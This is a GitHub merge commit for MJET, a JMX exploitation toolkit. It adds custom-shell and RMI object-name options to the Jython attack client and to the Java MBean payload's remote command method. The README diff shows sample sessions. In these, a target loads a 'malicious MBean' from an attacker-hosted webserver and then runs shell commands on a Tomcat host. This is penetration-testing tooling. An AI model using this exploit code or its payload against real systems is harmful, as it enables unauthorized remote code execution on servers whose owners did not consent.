Merge pull request #7 from Morn98/Feature_Update

Adding support for RMI Object selection name and provide a custom shell
mogwailabs · May 13, 2021 · 96d366e · 96d366e
2 parents b835a6d + 540cea2
commit 96d366e
Show file tree

Hide file tree

Showing 5 changed files with 69 additions and 10 deletions.
diff --git a/README.md b/README.md
@@ -35,6 +35,8 @@ Authentication support (if JMX authentication is enabled):
 Other optional arguments:
 * **--jmxmp** - Use JMX-MP (requires to load an additional JAR)
 * **--localhost_bypass** - service port for the proxy in localhost bypass
+* **--shell** - Use defined shell
+* **--rmiObjectName** - RMI name of the JMX endpoint 
 
 ### Modes and modeOptions
 
@@ -360,6 +362,54 @@ MJET - MOGWAI LABS JMX Exploitation Toolkit
 [+] Done
 ``` 
 
+### Custom RMI Object Name
+Sometimes it happens that the RMI object name of the JMX endpoint is not jmxrmi, in this case the parameter --rmiObjectName can be used to specify the appropriate RMI object name, for example --rmiObjectName=customJmxRmi.
+```bash
+$ jython mjet.py --rmiObjectName=customJmxRmi 172.17.0.2 2222 super_secret install http://172.17.0.1:8000 8000
+
+MJET - MOGWAI LABS JMX Exploitation Toolkit
+===========================================
+[+] Starting webserver at port 8000
+[+] Connecting to: service:jmx:rmi:///jndi/rmi://10.165.188.23:2222/customJmxRmi
+[+] Connected: rmi://10.165.188.1  1
+[+] Loaded javax.management.loading.MLet
+[+] Loading malicious MBean from http://10.165.188.1:8000
+[+] Invoking: javax.management.loading.MLet.getMBeansFromURL
+10.165.188.23 - - [26/Apr/2019 21:50:37] "GET / HTTP/1.1" 200 -
+[+] Successfully loaded MBeanMogwaiLabs:name=payload,id=1
+[+] Changing default password...
+[+] Loaded de.mogwailabs.MogwaiLabsMJET.MogwaiLabsPayload
+[+] Successfully changed password
+[+] Done
+$  
+```
+
+### Using own defined Shell
+Sometimes it happens that the target system does not provide a /bin/bash or cmd.exe shell. In this case the optional parameter --shell can be specified, for example --shell="bash -c". By executing the javascript javaproperties.js with mjet.py, more details about the environment are given. 
+```
+$ jython mjet.py --shell="bash -c" 10.165.188.23 2222 command super_secret "ls -la"
+
+MJET - MOGWAI LABS JMX Exploitation Toolkit
+===========================================
+[+] Connecting to: service:jmx:rmi:///jndi/rmi://10.165.188.23:2222/jmxrmi
+[+] Connected: rmi://10.165.188.1  4
+[+] Loaded de.mogwailabs.MogwaiLabsMJET.MogwaiLabsPayload
+[+] Executing command: ls -la
+total 20
+drwxr-xr-x  5 root    root    4096 Apr 26 11:12 .
+drwxr-xr-x 33 root    root    4096 Apr 10 13:54 ..
+lrwxrwxrwx  1 root    root      12 Aug 13  2018 conf -> /etc/tomcat8
+drwxr-xr-x  2 tomcat8 tomcat8 4096 Aug 13  2018 lib
+lrwxrwxrwx  1 root    root      17 Aug 13  2018 logs -> ../../log/tomcat8
+drwxr-xr-x  2 root    root    4096 Apr 26 11:12 policy
+drwxrwxr-x  3 tomcat8 tomcat8 4096 Apr 10 13:54 webapps
+lrwxrwxrwx  1 root    root      19 Aug 13  2018 work -> ../../cache/tomcat8
+
+
+[+] Done
+$
+```
+
 Reference: https://www.optiv.com/blog/exploiting-jmx-rmi
 
 ## Contributing

diff --git a/mjet.py b/mjet.py
@@ -65,7 +65,7 @@ def jxmrmi_url(args):
     from javax.management.remote import JMXServiceURL
 
     jmx_url = JMXServiceURL("service:jmx:rmi:///jndi/rmi://" +
-                            args.targetHost + ":" + args.targetPort + "/jmxrmi")
+                            args.targetHost + ":" + args.targetPort + "/" + args.rmiObjectName)
     return jmx_url
 
 
@@ -291,26 +291,28 @@ def changePassword(password, newpass, bean_server):
 
 def commandMode(args):
     bean_server = connectToJMX(args)
-    executeCommand(args.password, args.cmd, bean_server)
+    executeCommand(args.password, args.cmd, bean_server, args.shell)
     print "[+] Done"
 
 
-def executeCommand(password, cmd, bean_server):
+def executeCommand(password, cmd, bean_server, shell):
     # Payload execution
     # Load the Payload MLet and invoke a method on it
     mlet_bean = bean_server.getObjectInstance(
         ObjectName("MogwaiLabs:name=payload,id=1"))
     print "[+] Loaded " + str(mlet_bean.getClassName())
 
     print "[+] Executing command: " + cmd
-    inv_array1 = jarray.zeros(2, Object)
+    inv_array1 = jarray.zeros(3, Object)
     inv_array1[0] = password
     inv_array1[1] = cmd
+    inv_array1[2] = shell
 
-    inv_array2 = jarray.zeros(2, String)
+    inv_array2 = jarray.zeros(3, String)
     inv_array2[0] = String.canonicalName
     inv_array2[1] = String.canonicalName
-
+    inv_array2[2] = String.canonicalName
+
     resource = bean_server.invoke(
         mlet_bean.getObjectName(), "runCMD", inv_array1, inv_array2)
 
@@ -576,6 +578,8 @@ def arg_cve_2016_3427_mode(args):
 parser.add_argument('--jmxpassword', help='remote JMX password')
 parser.add_argument('--jmxmp', action='store_true',
                     help='Use JMX Message Protocol')
+parser.add_argument('--shell', help='run with custom shell')
+parser.add_argument('--rmiObjectName', help='RMI name of the JMX endpoint', default='jmxrmi')
 parser.add_argument('--localhost_bypass',
                     default=None,
                     dest="localhost_bypass_port",

diff --git a/payloads/MogwaiLabsMJET-MLet.jar b/payloads/MogwaiLabsMJET-MLet.jar
diff --git a/...oads_src/MogwaiLabsMJET/src/main/java/de/mogwailabs/MogwaiLabsMJET/MogwaiLabsPayload.java b/...oads_src/MogwaiLabsMJET/src/main/java/de/mogwailabs/MogwaiLabsMJET/MogwaiLabsPayload.java
@@ -16,7 +16,7 @@ public MogwaiLabsPayload() {
 	}
 
 	@Override
-	public String runCMD(String passwd, String cmd) {
+	public String runCMD(String passwd, String cmd, String shell) {
 
 
 		if (passwd.equals(this.password) == false)  {
@@ -27,8 +27,13 @@ public String runCMD(String passwd, String cmd) {
 
 
 			String[] full_cmd;
-
-			if(System.getProperty("line.separator").equals("\n"))
+			String[] sh;
+
+			if(shell != null) {
+				sh =  shell.split(" ");
+				full_cmd = new String[] {sh[0], sh[1], cmd};
+			}
+			else if(System.getProperty("line.separator").equals("\n"))
 				full_cmd = new String[]{"bash","-c",cmd};
 			else // Assumes win
 				full_cmd = new String[]{"cmd.exe","/c",cmd};

diff --git a/...src/MogwaiLabsMJET/src/main/java/de/mogwailabs/MogwaiLabsMJET/MogwaiLabsPayloadMBean.java b/...src/MogwaiLabsMJET/src/main/java/de/mogwailabs/MogwaiLabsMJET/MogwaiLabsPayloadMBean.java
@@ -2,7 +2,7 @@
 
 public interface MogwaiLabsPayloadMBean {
 
-    public abstract String runCMD(String passwd, String cmd);
+    public abstract String runCMD(String passwd, String cmd, String shell);
     public abstract String runJS(String passwd, String js);
     public abstract boolean changePassword(String oldPass, String newPass);